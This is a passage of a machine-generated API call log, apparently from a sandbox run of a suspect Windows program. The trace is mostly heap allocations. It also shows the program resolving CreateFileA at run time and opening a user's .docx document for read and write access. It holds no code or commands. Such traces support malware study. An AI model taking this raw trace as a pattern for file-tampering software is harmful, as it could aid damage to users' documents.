returned 0x889970 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0036.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0036.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.947] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0036.947] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd48 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5b8 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0036.948] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.948] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897f0 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899d0 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7d8 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0036.949] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0036.949] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbc8 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4f8 | out: hHeap=0x770000) returned 1 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c988 [0036.950] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0ce8 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5c8 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.950] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.950] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.951] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0036.951] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af368 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.952] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0036.952] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb) returned 0x88c910 [0036.952] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x88c910, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.952] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFile") returned 0x0 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.952] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0036.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x88c910, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0036.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.953] GetProcAddress (hModule=0x76e10000, lpProcName="CreateFileA") returned 0x76e253c6 [0036.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0036.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af478 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10001) returned 0xaa0008 [0036.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", cchWideChar=55, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 55 [0036.953] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x37) returned 0x7c2080 [0036.953] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", cchWideChar=55, lpMultiByteStr=0x7c2080, cbMultiByte=55, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx", lpUsedDefaultChar=0x0) returned 55 [0036.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0036.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0036.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0036.953] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af608 | out: hHeap=0x770000) returned 1 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0036.954] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\zldtrs1nh.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af608 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b13f0 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c910 | out: hHeap=0x770000) returned 1 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c910 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af588 [0036.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=55, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 55 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x6e) returned 0x7db378 [0036.954] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xaa0008, cbMultiByte=55, lpWideCharStr=0x7db378, cchWideChar=55 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\zldtrs1nh.docx") returned 55 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0036.954] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db300 [0036.954] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0xaa0008 | out: hHeap=0x770000) returned 1 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889490 | out: hHeap=0x770000) returned 1 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889490 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899a0 | out: hHeap=0x770000) returned 1 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbe0 [0036.955] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0036.955] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 